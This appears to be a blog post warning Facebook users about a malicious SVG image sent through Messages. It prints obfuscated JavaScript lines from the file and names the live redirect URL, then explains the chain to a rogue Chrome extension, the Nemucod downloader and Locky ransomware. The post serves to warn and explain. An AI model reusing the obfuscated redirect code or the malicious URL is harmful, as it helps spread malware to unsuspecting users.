Facebook SPAM Alert! – Malicious SVG File is Spreading through Facebook Messages
Have you received any kind of image file through Facebook messages lately?
If yes, is it in SVG format?
If it is, please don't click on it.
Spammers have created a malicious image (an SVG file) that will make you install ransomware on your system and thereby infect most of your friends through the same medium, i.e. Facebook messages.
Scalable Vector Graphics (SVG) is an XML-based image format used to serve vector images. If you notice, our logo is also in SVG format. You can download it and inspect it by opening the file in a text editor.
What would happen if you clicked that spam image?
You can check out the SVG file's code here:
If you look at the SVG file on Pastebin, note lines 48 to 51:
var hdekw = window;
var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);
var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);
var lpvxzt = bxtqxbl("nso6/z",2,false);
hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);
The spammers have cleverly used cryptographic techniques to bypass Facebook's file checkers and then execute a window function.
If you log these variables in the console:
You would get this:
Clearly, the malicious SVG file is attempting to redirect you to http://mourid.com/php/trust.php, which happens to be a fake YouTube video page that will force you to install a malicious Chrome extension.
Once the extension is installed, it exploits your browser's access to your Facebook account to secretly spam your friends with the same SVG image file, helping this spam spread further.
In addition, the extension downloads the "Nemucod downloader", a generic malware downloader generally used to fetch and install various ransomware. In this case the malware downloader downloads "Locky ransomware", leaving your system locked.